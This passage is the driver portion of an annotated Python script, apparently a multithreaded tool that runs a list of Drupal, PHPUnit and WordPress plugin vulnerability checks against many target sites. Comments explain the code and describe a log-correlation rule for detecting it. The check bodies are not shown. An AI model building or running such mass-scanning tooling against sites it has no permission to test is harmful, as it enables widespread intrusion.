- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Stub: normalises the URL and does nothing else. Run_Work() does not call it.
- def wordpress_cubed(site):
- url = Domains(site)
# Per-target driver: runs every enabled check in sequence against one site,
# then clears the terminal. Because the checks are unconditional, a single
# scanned host sees the Drupal 7, PHPUnit, Drupal 8 and WordPress request
# patterns back to back from the same client. That clustering of unrelated
# CMS probes in a short window is itself a useful correlation rule for
# spotting this tool in access logs.
- def Run_Work(site):
- url = Domains(site)
- drupal7_1(url)
- phpunit(url)
- mail(url)
- timezone(url)
- wp_spritz(url)
- ad_manager(url)
- backup(url)
- wp_reset(url)
- Arforms_config(url)
- wp_install(url)
- os.system('clear')
# Entry point: maps Run_Work over the loaded target list `woh` with a pool of
# 40 threads (multiprocessing.dummy), then prints the elapsed wall-clock time.
- def Main():
- start = timer()
- pp = ThreadPool(40)
- pr = pp.map(Run_Work, woh)
- print('Time: ' + str(timer() - start) + ' seconds')
# Script guard: run Main() only when executed directly.
- if __name__ == "__main__":
- Main()
# Disabled code: the triple-quoted string below is never executed.
- """
- if 'Linux' in ambush:
- print("{} --> vuln" .format(kontil))
- else:
- print("{} --> Not Vuln" .format(kontil))
- """